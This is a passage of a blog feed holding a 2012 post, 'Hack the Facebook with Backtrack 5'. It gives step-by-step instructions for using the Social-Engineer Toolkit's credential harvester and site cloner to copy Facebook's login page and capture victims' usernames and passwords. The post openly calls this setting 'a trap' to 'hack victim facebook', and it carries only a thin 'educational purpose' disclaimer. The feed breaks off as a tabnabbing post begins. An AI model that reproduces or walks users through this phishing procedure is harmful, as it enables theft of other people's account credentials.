&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;,Courier,monospace;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;background-color: white; text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;,Courier,monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;Let&#39;s GO ... &lt;/b&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;

&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;

&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLlNTNSspG2XDrShaWpGtNl3-EKB2vyNYG8a2dl_jaK-yyz8pTcTlGT-lhXqMlOIkAuLtkL3mZFur3Z-cfvhYzcDQvqjFmKgBVcKVvkgZ7xTFMtzLmZ6PKaz4cn3WJRZBkcWKBOIIW1eY/s1600/setwithbacktrack1.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLlNTNSspG2XDrShaWpGtNl3-EKB2vyNYG8a2dl_jaK-yyz8pTcTlGT-lhXqMlOIkAuLtkL3mZFur3Z-cfvhYzcDQvqjFmKgBVcKVvkgZ7xTFMtzLmZ6PKaz4cn3WJRZBkcWKBOIIW1eY/s640/setwithbacktrack1.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;Step 1 :&lt;/b&gt; Open &lt;u&gt;s&lt;/u&gt;et Tool in Backtrack 5 : To open it follow the step shown above .&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;

&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjh1_oZPQPuJECv5lNn5uxz68qZp9bVlRWWHy6jNsmByWxhHJ5w7LuYuGctUUYUJ8bkyuUR2sJitB714l50qXpmEd5WeZT7J9ni4AAe280nB1_S60fXuN1h9cmj49uHr-DXbA2hi9vaMHY/s1600/setwithbacktrack2.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjh1_oZPQPuJECv5lNn5uxz68qZp9bVlRWWHy6jNsmByWxhHJ5w7LuYuGctUUYUJ8bkyuUR2sJitB714l50qXpmEd5WeZT7J9ni4AAe280nB1_S60fXuN1h9cmj49uHr-DXbA2hi9vaMHY/s640/setwithbacktrack2.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot;&gt;Step 2&lt;/span&gt; : Time to set the&lt;b&gt; Website Attack Vectors&lt;/b&gt; : Below &lt;b&gt;Menu&lt;/b&gt;&amp;nbsp;&amp;nbsp; enter your&lt;b&gt; choice&lt;/b&gt; :&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&amp;nbsp;2.Website Attack Vectors&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;and press &lt;b&gt;Enter .&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;

&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf2JkxQNvZsY4fvsCCwDf9mBP1RIJOZk2lxlRurZ-tubTy9cE9TSHWXMUEnwf8DdxR0R7RpFgkUsjXhLljCaB7GeaauN28GOH_ZSZELEhbxA_QBQuDosvaoRqw9hyUj7V4KwElsfgg8X4/s1600/setwithbacktrack3.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;398&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf2JkxQNvZsY4fvsCCwDf9mBP1RIJOZk2lxlRurZ-tubTy9cE9TSHWXMUEnwf8DdxR0R7RpFgkUsjXhLljCaB7GeaauN28GOH_ZSZELEhbxA_QBQuDosvaoRqw9hyUj7V4KwElsfgg8X4/s640/setwithbacktrack3.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot;&gt;&lt;b&gt;Step 3&lt;/b&gt;&lt;/span&gt;&lt;b&gt; : Select your Attacking Method , Here i choose&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;3. Credential Harvester Attack Method.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;

&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFZdRQFYl3ISKnMtu5pxQVLKuGFFhyphenhyphengKaYAqedJneqkD8s6DiZ4J3Prclhp5upaHmw6mc1kp0fEXKz80eHKfRMpq6Vk2ELlcwkbcKedCBgrL8TxJzXDyTR4b_ZIvE3uiB-MORT4Oy0LCg/s1600/setwithbacktrack4.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFZdRQFYl3ISKnMtu5pxQVLKuGFFhyphenhyphengKaYAqedJneqkD8s6DiZ4J3Prclhp5upaHmw6mc1kp0fEXKz80eHKfRMpq6Vk2ELlcwkbcKedCBgrL8TxJzXDyTR4b_ZIvE3uiB-MORT4Oy0LCg/s640/setwithbacktrack4.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;Step 4 :&lt;/b&gt;&lt;b&gt;&amp;nbsp;Select &lt;/b&gt;&lt;b&gt;Attack Vectors&lt;/b&gt;&lt;b&gt; :write &lt;/b&gt;&lt;b&gt;&amp;nbsp;2. Site Cloner&lt;/b&gt;&lt;b&gt; and press enter as shown in the image .&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;

&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDgAPz0ukxwoIAbfaJUExkDH-CqGAg-FkkANhhzoOwktj3aRSw0GB52OT8BfJbU16c_A3G6BxoTnaYR4KpYfPPa65hWiljNeUwYyPgwRMLjM3Ztg_gDbk7Da8xBQp12hRLcoOmxzdAbkM/s1600/setwithbacktrack5.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDgAPz0ukxwoIAbfaJUExkDH-CqGAg-FkkANhhzoOwktj3aRSw0GB52OT8BfJbU16c_A3G6BxoTnaYR4KpYfPPa65hWiljNeUwYyPgwRMLjM3Ztg_gDbk7Da8xBQp12hRLcoOmxzdAbkM/s640/setwithbacktrack5.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;Step 5:&lt;/b&gt;&lt;b&gt; Enter the Url: To make a clone to facebook login page I entered &lt;/b&gt;&lt;b&gt;https://www.facebook.com &lt;/b&gt;&lt;b&gt;and press enter . As I press enter it will automatically generate a clone page .&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;

&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe5GbM7guliALBucWkyrvyBGZ3RYYOpC8oW7Wu7LBXeZHEy8arIVyCr9iISDHMv5w-0D3yF_znaCam2Enafi9VsB5mORnh7v4qh_54uOdl6qesUt3ctzLn8yyCfpT3CR-WJedgXV5BcQs/s1600/setwithbacktrack6.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe5GbM7guliALBucWkyrvyBGZ3RYYOpC8oW7Wu7LBXeZHEy8arIVyCr9iISDHMv5w-0D3yF_znaCam2Enafi9VsB5mORnh7v4qh_54uOdl6qesUt3ctzLn8yyCfpT3CR-WJedgXV5BcQs/s640/setwithbacktrack6.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;Step 6 :&lt;/b&gt;&lt;b&gt; To continue the process you have to put &lt;/b&gt;&lt;b&gt;*&lt;/b&gt;&lt;b&gt; sign and press enter.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;

&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglLrTDCJZWKSPq1aG4nw-sgj9Ptq945mAdAYA9oqoeEGdZIiVE5b3nDa-w4YUXywCj7n_51nWpaGvoJvjPqR7KyyxobolW0QXqmY415Wr1I0nVQM5T-3uAJ8X-40KkXxF8J9M4BC82zfE/s1600/setwithbacktrack7.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;404&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglLrTDCJZWKSPq1aG4nw-sgj9Ptq945mAdAYA9oqoeEGdZIiVE5b3nDa-w4YUXywCj7n_51nWpaGvoJvjPqR7KyyxobolW0QXqmY415Wr1I0nVQM5T-3uAJ8X-40KkXxF8J9M4BC82zfE/s640/setwithbacktrack7.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;Step 7 &lt;/b&gt;&lt;b&gt;: Process will continue as shown in the image above .&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;

&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQOfxVWSGLox9w_lkfhJuMmzadmTzafPFGepDqDp-CTz_YZAiaB-a8pxZqiWsmrsoPPD73wH1uuSrgReB4I6-wP-uuD8ZWJ7WqhYvccD-JsbI92A9rYclbnUyRH7yNSz2XOU1B0gCDFCg/s1600/setwithbacktrack8.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQOfxVWSGLox9w_lkfhJuMmzadmTzafPFGepDqDp-CTz_YZAiaB-a8pxZqiWsmrsoPPD73wH1uuSrgReB4I6-wP-uuD8ZWJ7WqhYvccD-JsbI92A9rYclbnUyRH7yNSz2XOU1B0gCDFCg/s640/setwithbacktrack8.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;Step 8:&lt;/b&gt;&lt;b&gt; Open terminal and enter &lt;/b&gt;&lt;b&gt;ifconfig command&lt;/b&gt;&lt;b&gt; . It will shown your ip address . Now&lt;/b&gt;&lt;b&gt; copy &lt;/b&gt;&lt;b&gt;the ip address .&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;

&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;

&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj13qYin7sLU2aqGFB0OQcQjxH2rbU4tX26C0MYo-kS7xXtWGnaY4pPnT6hDIEFJA_KcTBE3fIdw8Miq6hNnqosezDPceIxU59ueExDOyiX5Czag13pBgqXBbiei87XWpdYiQiU3i6iKF8/s1600/setwithbacktrack9.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;398&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj13qYin7sLU2aqGFB0OQcQjxH2rbU4tX26C0MYo-kS7xXtWGnaY4pPnT6hDIEFJA_KcTBE3fIdw8Miq6hNnqosezDPceIxU59ueExDOyiX5Czag13pBgqXBbiei87XWpdYiQiU3i6iKF8/s640/setwithbacktrack9.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;Step9 &lt;/b&gt;&lt;b&gt;:Open Web Browser and &amp;nbsp;&lt;/b&gt;&lt;b&gt;Paste&lt;/b&gt;&lt;b&gt; the &lt;/b&gt;&lt;b&gt;system ipaddress &lt;/b&gt;&lt;b&gt;into &lt;/b&gt;&lt;b&gt;Address bar&lt;/b&gt;&lt;b&gt; and it will redirect to the &lt;/b&gt;&lt;b&gt;facebook login page&lt;/b&gt;&lt;b&gt; .&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;Now Enter your anything to check it will work or not .&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;,Courier,monospace;&quot;&gt;&lt;b&gt;FOR EXAMPLE: Here I use&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot;&gt;Email &lt;/span&gt;: h4x00r&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot;&gt;Password&lt;/span&gt;:hackingDNA.com&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;,Courier,monospace;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;And Press Enter . Let see what happen on the Next step .&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;

&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPJ5ffKK8r1q6TRlGPQLS-0tuhaEBv2daflkB3a5zHut32z_4TDUxj1Y4p7ZV7XphAYs5aTuxhCli2RhygH6ED7is7v5OUSC5Dhv0T5kPV7ZPmjLndZ4-_FMC6fseFTbWE2lhzyV3kUaY/s1600/SETWITHBACKTRACK10.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;396&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPJ5ffKK8r1q6TRlGPQLS-0tuhaEBv2daflkB3a5zHut32z_4TDUxj1Y4p7ZV7XphAYs5aTuxhCli2RhygH6ED7is7v5OUSC5Dhv0T5kPV7ZPmjLndZ4-_FMC6fseFTbWE2lhzyV3kUaY/s640/SETWITHBACKTRACK10.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot;&gt;Step 10 &lt;/span&gt;:
 In step 7 the process start you remember now when you follow step 8 and
 step 9 &amp;nbsp;,then it will come up with &amp;nbsp;all the details of Username and 
Password .&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;,Courier,monospace;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;,Courier,monospace;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;This is how we set a trap and hack victim facebook and password only on &lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: medium;&quot;&gt;Backtrack 5&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;Enjoy!&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;,Courier,monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;,Courier,monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;,Courier,monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: medium;&quot;&gt;Note:This article is just for Educational purpose &amp;nbsp;only . Do &amp;nbsp;at your own risk.&lt;/span&gt;&lt;/b&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/1350490457082289855/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/05/hack-facebook-with-backtrack-5.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/1350490457082289855'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/1350490457082289855'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/05/hack-facebook-with-backtrack-5.html' title='Hack the Facebook with Backtrack 5'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLlNTNSspG2XDrShaWpGtNl3-EKB2vyNYG8a2dl_jaK-yyz8pTcTlGT-lhXqMlOIkAuLtkL3mZFur3Z-cfvhYzcDQvqjFmKgBVcKVvkgZ7xTFMtzLmZ6PKaz4cn3WJRZBkcWKBOIIW1eY/s72-c/setwithbacktrack1.jpg" height="72" width="72"/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-798679630864552149</id><published>2012-05-23T07:07:00.003-07:00</published><updated>2013-09-04T09:58:43.070-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><title type='text'>What is tab napping and step-by-step process to create tab napping</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
